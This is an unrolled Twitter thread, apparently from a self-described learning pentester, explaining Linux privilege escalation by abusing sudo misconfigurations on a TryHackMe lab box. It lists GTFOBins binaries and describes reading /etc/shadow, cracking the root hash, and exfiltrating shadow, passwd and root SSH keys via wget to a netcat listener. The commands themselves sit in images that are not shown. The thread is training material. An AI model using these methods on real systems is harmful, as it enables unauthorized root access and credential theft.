Abusing SUDO rights and popping r00t shells

A thread🧵
#infosec #CyberSecurity #bugbountytips Image
In this thread🧵, I will be discussing how you can pop a root shell by abusing SUDO rights misconfiguration and will be demonstrating this using this box:…
First things first, let’s start with theoretical concepts!!😄
What is SUDO👑?
Sudo (Superuser Do) - is a Unix and Linux based utility that gives users permissions to run commands at the `root` level (most powerful user).
The `Sudo -l` Command
This command list the programs/binaries which `sudo` allows a user to run with root privileeges and without being asked the `root` password. For long listing use `sudo -ll` Image
- From the above snippet you can see user `traw` can all run all the commands as root without being asked root password but only traw's password. That's a security issue because we can easily abuse this to escalate to the root user by simply issuing the following command(sudo su) Image
Alright let's look at another example, in this example will be using the @RealTryHackMe box. I have provided the link above. Image
From the above snippet you can see that the user `user` can be able to run quite a number of programs with root level permissions. We can abuse those binaries to escalate our privileges to root,
there is cool website with some instructions on how to gain root shell using the above listed programs. Visit GTFOBins( and search for some of the program names.
If the program is listed with `sudo` as a function, you can use it to elevate privileges, usually via an escape sequence. Let’s take a look at all binary one by one and try to gain a root shell, using the instructions from GTFOBins.
1. Using AWK from the above snippet Image
2. Using VIM Command Image
3. Using FIND command Image
4. Using NMAP command Image
5. Using MAN command Image
6. Using MORE/LESS commands Image
7. Using FTP Image
8 Abusing Intended Functionality

Let's say we run `sudo -l` and found that we can run apache2 or wget with root level permissions. Sadly, with these binaries you can't get `shell` and you can't also even edit system files too,
but using these binaries we abuse their functionality to view `important` systems files.

8a. Abusing Apache2 Image
From the above snippet you can clearly see that we able to view the contents of the `/etc/shadow` file.
Sadly no Shell. But we have manage to extract root hash that means we can crack the harsh using online methods (``) or some tools like hashcat, john etc
8b. Abusing WGET
With `wget` we can dump some important system files like the `/etc/shadow`, `/etc/passwd` file, root ssh keys etc. To do this you have to setup a netcat listener on the attacker machine: Image
That's it! Thank you for reading today's thread😇. If you have other privilege escalation vectors I have missed, feel free to add them in the comments. Would love to know them as well. And be sure to rt🔄 , like💌 and follow👨‍👨‍👧‍👧 me (@xtremepentest) for more future Linux content.

• • •

Missing some Tweet in this thread? You can try to force a refresh

Keep Current with Traw - Xtreme Pentesting

Traw - Xtreme Pentesting Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!


Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @xtremepentest

17 Nov
Basic Linux 🐧Commands📜 For Text Manipulation

A thread🧵

Hello everyone👋, Today I'll be doing a quick, easy to follow thread🧵 on basic Linux commands for text manipulation.
#infosec #cybersecurity #Linux Image
1. Echo🐧
The echo command is used to display line of text to the standard output(stdout). Image
2. Cat🐧
The cat command is used concatenate files and print their contents on the standard output. In other words it's just used to display the contents of a file. Image
Read 27 tweets
16 Nov
OSCP (Offensive Security Certified Professional) Pass and Preparation - Tips and Tricks💡

A thread🧵

#oscp #CyberSecurity #infosec Image
2. [0x4D31/awesome-oscp: A curated list of awesome OSCP resources (](…)
Read 16 tweets
6 Oct
/A thread🧵👇
There was part one be sure to check it out.

#cybersecurity #infosec #Security

- Corey Schafer (@CoreyMSchafer)- YouTube -
- code with tim python (@TechWithTimm) - YouTube
Read 14 tweets
6 Oct

Do yourself a favour and learn to hack🐞.

You just have to START!🏁, you will be good in no time⏱️.

/ A mega thread🧵👇

Here are a few resources for you to get started.
#cybersecurity #CyberAttack #infosec #hacker
Also, please note that I'm not a professional hacker or pentester. I'm still learning to be, so these are the resources I have found useful along my journey.

1) Basic IT skills.👶🍼
If you are brand new to IT, I strongly recommend this course.
This is a FREE course by Professor Messer –…
Read 24 tweets
18 Aug
#Learn 📚 #Linux🐧:

A thread

Some useful Linux terminal keyboard shortcuts you should know to increase productivity. 👇

#CodeNewbie #coder #computer #code #java #100DaysOfCode #golang #privacy #css #javascript #html #linuxfan #linuxwindows #linuxmint #linuxubuntu #linuxtips
1) Working With Processes📈
Use the following shortcuts⌨️ to manage running🏃 processes.
#linuxfan #linuxwindows #linuxmint #linuxubuntu #linuxtips #linux #programming #hacking #coding #python #cybersecurity #hacker #kalilinux #programmer #technology #coder #100DaysOfCode
2) Controlling the Screen💻
The following shortcuts⌨️ allow you to control what appears on the screen.

#linuxfan #linuxwindows #linuxmint #linuxubuntu #linuxtips #programming #hacking #coding #python #cybersecurity #hacker #kalilinux #programmer #technology #100DaysOfCode
Read 10 tweets
16 Aug
#Learn 🧠🐍#python: Sometimes when programming in python they're situations when you want to copy the contents of an existing list into another. Python has several ways of achieving that. In this thread you will learn different ways of achieving that with the help of examples. Image
1) Using the equal (=) sign operator:
Using = operator you can copy the contents of an existing list onto another/new list. But there's a problem with this method which I will explain on the next section. Image
The problem with the above method is that if you modify the new copied_fruits list the original list (fruits) is modified too, this is because the copied list (copied_fruits) is referencing/ pointing to same fruits list in memory.
Read 17 tweets

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Too expensive? Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Thank you for your support!

Follow Us on Twitter!